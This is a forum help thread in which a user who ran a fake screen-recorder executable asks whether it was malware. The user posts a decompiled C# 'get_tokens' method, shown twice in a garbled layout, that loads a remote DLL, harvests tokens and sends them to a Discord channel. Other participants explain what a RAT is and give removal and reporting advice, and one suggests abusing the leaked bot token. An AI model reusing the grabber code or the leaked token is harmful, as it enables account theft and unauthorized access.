C#•5mo ago

✅ did i install a malware?

hello there i was trying to find a screen recording app on github so i found this repo and it had instructions and everything but the project was only an exe, so i installed it and i thought it was a false postive (i know im dumb) anyway after then when i tried to open the exe file nothing appears at all, so i figured it is a malware or something, then i tried to unpack the exe so i searched for methods to decompile and eventually i happened to find an app called dotpeek, i managed to decompile the app and eventually found the source code and it was this as shown in the picture below, i dont know what information from me was stolen, but i am here to ask what is a discord rat what does this even mean whats the purpose of this porject if anyone knows also the app included the token of the discord bot and a guid id, what can i do with these

55 Replies

Jimmacle•5mo ago

report it to discord and stop clicking sketchy links or running sketchy programs without seeing the rest of the code i would guess it tries to either steal your discord token and/or send messages from your account or it's the other way and they're using a discord server as a way to run commands on your PC

RamseyOP•5mo ago

what do i do with the bot token and the guild id that i retrived, i am a complete beginner, is it legal to login into it and find what information is there or do i just report it to discord

Jimmacle•5mo ago

you're better off just reporting it give them that information so they can shut down the server and whoever made the malware

SpReeD•5mo ago

RAT is an abbrev. for Remote Administration Tool, yes, it's a cover name for a certain type of a trojan since the late 90s

mg•5mo ago

and here's a legitimate screen recorder https://obsproject.com/

Open Broadcaster Software | OBS

OBS (Open Broadcaster Software) is free and open source software for video recording and live streaming. Stream to Twitch, YouTube and many other providers or record your own videos with high quality H264 / AAC encoding.

Buddy•5mo ago

RATs are the worst kinds of malware after ransomwares of course. As your PC turns into a Zombie basically. The attacker gains full control of your machine. If it's truly a "RAT" and not some person unaware of its meaning and just heard about it. It's basically if you had TeamViewer on 24/7 and they can access everything

mg•5mo ago

i'd rather be ransomwared than have someone have access to my machine

Buddy•5mo ago

RATs can be recovered from, you're toast with ransomwares

mg•5mo ago

if you keep backups then the recovery from a ransomware attack is just wiping your machine and restoring from a backup

Buddy•5mo ago

Just check autostart, temp directories, etc. Sysinternals autoruns is a great tool for that

ACiDCA7•5mo ago

just out of interest, how do you get from screenrecoder to something discordrelated? i mean even the assembly is called discordrat

RamseyOP•5mo ago

what do you mean ah probably pasted in multiple applications

ACiDCA7•5mo ago

when you want to download a screenrecorder, and you download something expecting a screenrecorder there should go all alarms up if what you download is called discord***

Buddy•5mo ago

https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns

Autoruns for Windows - Sysinternals

See what programs are configured to startup automatically when your system boots and you login.

Buddy•5mo ago

Install this Delete everything that does not belong

ACiDCA7•5mo ago

malwarebytes wouldnt hurt aswell

RamseyOP•5mo ago

well im no expert in computer science but the exe and the repo instructions has nothing to do with discord except for the code itself i also found something interesting

public static async Task get_tokens(string channelid)
{
  if (!Program.dll_holder.ContainsKey("token"))
    await Program.LoadDll("token", await Program.LinkToBytes(Program.dll_url_holder["token"]));
  if (!Program.activator_holder.ContainsKey("token"))
    Program.activator_holder["token"] = Activator.CreateInstance(Program.dll_holder["token"].GetType("Token_grabber.grabber"));
  object obj = Program.activator_holder["token"];
  string input = string.Join("\n\n", (IEnumerable<string>) obj.GetType().GetMethod("grab").Invoke(obj, new object[0]));
  if (input.Length >= 1990)
  {
    string channelid1 = channelid;
    List<byte[]> attachments = new List<byte[]>();
    attachments.Add(Program.StringToBytes(input));
    string[] filenames = new string[1]{ "tokens.txt" };
    int num1 = await Program.Send_attachment(channelid1, "", attachments, filenames) ? 1 : 0;
    int num2 = await Program.Send_message(channelid, "Command executed!") ? 1 : 0;
  }
  else
  {
    int num3 = await Program.Send_message(channelid, "

public static async Task get_tokens(string channelid)
{
  if (!Program.dll_holder.ContainsKey("token"))
    await Program.LoadDll("token", await Program.LinkToBytes(Program.dll_url_holder["token"]));
  if (!Program.activator_holder.ContainsKey("token"))
    Program.activator_holder["token"] = Activator.CreateInstance(Program.dll_holder["token"].GetType("Token_grabber.grabber"));
  object obj = Program.activator_holder["token"];
  string input = string.Join("\n\n", (IEnumerable<string>) obj.GetType().GetMethod("grab").Invoke(obj, new object[0]));
  if (input.Length >= 1990)
  {
    string channelid1 = channelid;
    List<byte[]> attachments = new List<byte[]>();
    attachments.Add(Program.StringToBytes(input));
    string[] filenames = new string[1]{ "tokens.txt" };
    int num1 = await Program.Send_attachment(channelid1, "", attachments, filenames) ? 1 : 0;
    int num2 = await Program.Send_message(channelid, "Command executed!") ? 1 : 0;
  }
  else
  {
    int num3 = await Program.Send_message(channelid, "

" + input + "

") ? 1 : 0;
    int num4 = await Program.Send_message(channelid, "Command executed!") ? 1 : 0;
  }
}
.

") ? 1 : 0;
    int num4 = await Program.Send_message(channelid, "Command executed!") ? 1 : 0;
  }
}
.

and this string

Jimmacle•5mo ago

yes, it probably hijacks your discord account to spam messages to spread the malware and 100% allows the attacker to control your PC so you should get rid of this software asap using the tools the others mentioned

RamseyOP•5mo ago

Jimmacle•5mo ago

if you're lucky it's not particularly embedded in your system and you can just delete it

RamseyOP•5mo ago

Jimmacle•5mo ago

which, if they're using a discord server as a C&C server they're probably not smart enough to make it very persistent

MODiX•5mo ago

Buddy

As your PC turns into a Zombie basically. The attacker gains full control of your machine. If it's truly a "RAT" and not some person unaware of its meaning and just heard about it.

Quoted by

<@203166497198047232> from #did i install a malware? (click here)

React with ❌ to remove this embed.

ACiDCA7•5mo ago

hmm why did nobody recommend removing internetconnection yet? so it cant infect potentially other devices + no remote access

Buddy•5mo ago

Good question

RamseyOP•5mo ago

at the beginning it was almost impossible to simply delete the file but i managed with norton antivirus

Buddy•5mo ago

Boot up in safe mode, no internet. Run malwarebytes, after that run autostart and start deleting suspicious entries

exixt•5mo ago

and then delete Norton because it's overflow and windows defender today is enough, it's actually good, not like 10 years ago and run malwarebytes for spot checks every now and then, that's it and after that never download random exes, that's internet 101

mg•5mo ago

you should also report that repository to github if that's where the executabnle is hosted

RamseyOP•5mo ago

does github even care

Jimmacle•5mo ago

very much

exixt•5mo ago

yes

mg•5mo ago

yes

Jimmacle•5mo ago

https://docs.github.com/en/communities/maintaining-your-safety-on-github/reporting-abuse-or-spam#reporting-a-repository

GitHub Docs

Reporting abuse or spam - GitHub Docs

Jimmacle•5mo ago

using their site to distribute malware counts as abuse

ACiDCA7•5mo ago

just did a random search on github for discord rat.. well.. ms has to do some cleanup

RamseyOP•5mo ago

one extra question, about the dotpeek, does it actually decompile or just gives a c# representation of the binary i am going to reset my pc anyway

SG97•5mo ago

I hope you mean clean install

RamseyOP•5mo ago

reinstall os

ACiDCA7•5mo ago

it does decompile as best as it can.. it only has the information stored in the assembly but dotnet apps are pretty easy to decompile

SG97•5mo ago

because to me, resetting != clean install

RamseyOP•5mo ago

dude i have his bot token lol im not completely sure if its legal to do anything with it at this point, but the owner have literally done something terrible

ACiDCA7•5mo ago

report it

RamseyOP•5mo ago

already did im talking about using it to access the info about this malware though before discord shuts it down

ACiDCA7•5mo ago

i bet the token doesnt matter too much, its just to get pings if a victim falls for the scam. as you showed in another screenshot it wreaks more havoc beside sending couple messages via discord

RamseyOP•5mo ago

probably has a server channel' contains a text list of victims

ACiDCA7•5mo ago

why are you still here? go fix your pc to not be a potential hazard

Jimmacle•5mo ago

that's exactly what decompiling is it translates the IL into equivalent C#

RamseyOP•5mo ago

im on a diff pc

Jimmacle•5mo ago

which is why you should report it to discord so they can handle it not to be rude but you ignored your AV and installed a RAT, you shouldn't be trying to get justice yourself

RamseyOP•5mo ago

yeah sent a ticket

Anu6is•5mo ago

That's not possible. The token gives you access to the bot account... The application on discord. But it doesn't give you access to the code they use the token with.

Buddy•5mo ago

I personally would spam the authors channel with the bot so the author is forced to regenerate bot token and then all their malwares stops working

Unknown User•5mo ago

Message Not Public

Bob l'éponge•5mo ago

oof

Gaming

Programming

✅ did i install a malware?